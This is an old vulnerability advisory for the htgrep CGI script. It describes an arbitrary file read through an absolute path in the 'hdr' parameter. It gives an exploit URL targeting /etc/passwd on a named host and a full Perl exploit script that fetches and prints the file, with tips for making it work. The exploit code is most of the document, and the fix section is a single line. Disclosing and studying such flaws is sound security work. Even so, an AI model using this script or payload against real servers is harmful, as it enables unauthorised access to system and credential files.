|
Vulnerability htgrep Affected Htgrep CGI Description 'n30' found following. Any remote user can view arbitrary files on the system with the privileges of the web user with htgrep. The CGI allows a user to specify a header and footer file to be appended to the search output, this file should be located in the wwwroot which is specified in the script itself. Any attempt to specify a header or footer file by using backwards directory referencing is trapped. Although it is possible to specify a file using an absolute path. Exploit: http://www.dematel.com/cgibin/htgrep/file=index.html&hdr=/etc/passwd The File /etc/passwd will be displayed instead of the default header file. Code: #!/usr/local/bin/perl # # Htgrep EXPLOIT Script by n30 17/8/2000 # # For: Unix/Linux all Distro's # maybe Winnt?? anyone?? # # Versions: All upto latest: htgrep v3.0 # # Info: to find the version number being used: # # www.server.com/cgi-bin/htgrep/version # # Some ppl use a wrapper for the script thusly # eliminating the file argument, the sploit will # still werk just add &hdr=<filename> to the end :-) # # if &isindex=<text> is present in the URL REMOVE IT!!! # or else the exploit won't werk :-) # # Mail : n30@gmx.co.uk use strict; use LWP::UserAgent; use HTTP::Request; use HTTP::Response; my $ua = new LWP::UserAgent; # ************************************************* my $TargetHost="www.dematel.com"; my $TargetPath="/cgibin/htgrep"; # SearchFile can commonly be index.html or some other file in the wwwroot my $SearchFile="index.html"; # FiletoGet ?? think for ur self: my $FiletoGet="/etc/passwd"; # ************************************************** my $url="http://".$TargetHost.$TargetPath."/file=$SearchFile&hdr=$FiletoGet"; print("\nHtgrep Arbitrary File Reading Vulnerability EXPLOIT /n30\n\n"); print("URL: $url\n\n"); my $request = new HTTP::Request('GET', $url); my $response = $ua->request($request); if ($response->is_success) { print $response->content; } else { print $response->error_as_HTML; } Solution The author has been notified, it is likely that an update will be available shortly.